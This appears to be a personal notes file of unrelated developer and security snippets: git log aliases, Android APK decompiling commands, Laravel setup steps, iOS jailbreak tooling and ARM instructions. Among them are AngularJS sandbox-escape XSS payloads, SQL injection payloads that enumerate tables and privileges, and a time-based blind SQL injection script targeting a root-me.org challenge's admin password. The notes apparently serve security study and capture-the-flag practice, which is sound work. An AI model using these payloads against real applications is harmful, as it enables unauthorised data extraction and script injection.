veeeeeeeeeee

[alias]
  lg = !"git lg1"
  lg1 = !"git lg1-specific --all"
  lg2 = !"git lg2-specific --all"
  lg3 = !"git lg3-specific --all"

  lg1-specific = log --graph --abbrev-commit --decorate --format=format:'%C(bold blue)%h%C(reset) - %C(bold green)(%ar)%C(reset) %C(white)%s%C(reset) %C(dim white)- %an%C(reset)%C(auto)%d%C(reset)'
  lg2-specific = log --graph --abbrev-commit --decorate --format=format:'%C(bold blue)%h%C(reset) - %C(bold cyan)%aD%C(reset) %C(bold green)(%ar)%C(reset)%C(auto)%d%C(reset)%n''          %C(white)%s%C(reset) %C(dim white)- %an%C(reset)'
  lg3-specific = log --graph --abbrev-commit --decorate --format=format:'%C(bold blue)%h%C(reset) - %C(bold cyan)%aD%C(reset) %C(bold green)(%ar)%C(reset) %C(bold cyan)(committed: %cD)%C(reset) %C(auto)%d%C(reset)%n''          %C(white)%s%C(reset)%n''          %C(dim white)- %an <%ae> %C(reset) %C(dim white)(committer: %cn <%ce>)%C(reset)'

veeeeeeeeeee

###### install into emulator
adb install path\to\my\apk\file.apk

###### decompile
d2j-dex2jar path\to\my\apk\file.apk

###### AndroidManifest
java -jar apktool_2.0.3.jar d path\to\my\apk\file.apk -o output

###### logs

veeeeeeeeeee

<%@ page import="java.util.HashMap,
    		    java.io.*,
                   java.util.Map,
                   org.apache.commons.lang.StringUtils,
                   com.day.cq.i18n.I18n,
                   com.day.cq.personalization.UserPropertiesUtil,
                   com.day.cq.wcm.api.WCMMode,
                   com.day.cq.wcm.foundation.forms.FormsHelper,
                   com.day.text.Text" %>
<%@include file="/libs/foundation/global.jsp"%>

veeeeeeeeeee

prereq
	- jailbreak
	- cydia - openSSH

utils
	- class-dump-z
	- keychain_dump
	- cyscript
	- otool

veeeeeeeeeee

// 1.0.1 - 1.1.5
{{constructor.constructor('alert(1)')()}}

// 1.2.0 - 1.2.1
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

// 1.2.2 - 1.2.5
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}

// 1.2.6 - 1.1.18

veeeeeeeeeee

- create folder Helpers under app\
- create new class Helper {}
- include inside config\app.php
  'Helper' => App\Helpers\Helper::class,
- usage:
  use Helper;
  $h = new Helper();
  $h->stuff();

- create new file Helpers\helpers.php

veeeeeeeeeee

composer create-project --prefer-dist laravel/laravel MyProject

@@@@@@@@@@@@@@@@@@

php artisan make:model MyModel
php artisan make:model MyModel --migration

php artisan make:migration create_models_table --table=models
php artisan make:controller MyModelController --model=Model

veeeeeeeeeee

select 1,2,grantee, is_grantable from information_schema.user_privileges where privilege_type = conv(0x66696c65,16,2)--

and extractvalue(0x0a,concat(0x0a,(select column_name from information_schema.columns where table_name = 0x6d656d626572 limit 1 offset 2)))--

union all select group_concat(table_name from information_schema.tables)

select string_agg(column_name, chr(20)) from information_schema.columns where table_name = $$users$$

veeeeeeeeeee

#!/usr/bin/env python

import requests

baseurl = 'http://challenge01.root-me.org/web-serveur/ch40/'
inject = '1; select case when %s then pg_sleep(15) else pg_sleep(0) end--'

cond1 = '(chr(%d) = substr((select password from users where username = $$admin$$), %d, 1))'
cond2 = '((select chr(117)||chr(115)||chr(101)||chr(114)||chr(115)) in (select table_name from information_schema.tables))'
cond3 = '(%d < (select char_length((select password from users where username = $$admin$$))))'

veeeeeeeeeee

instructions

1. basic arithmetic

- and rga, rgb, arg     ; rga = rgb & arg
- eor _                 ;           ^
- sub _                 ;           -
- rsb _                 ; rga = arg - rgb
- add _                 ;           +
- adc _                 ;           +     + carry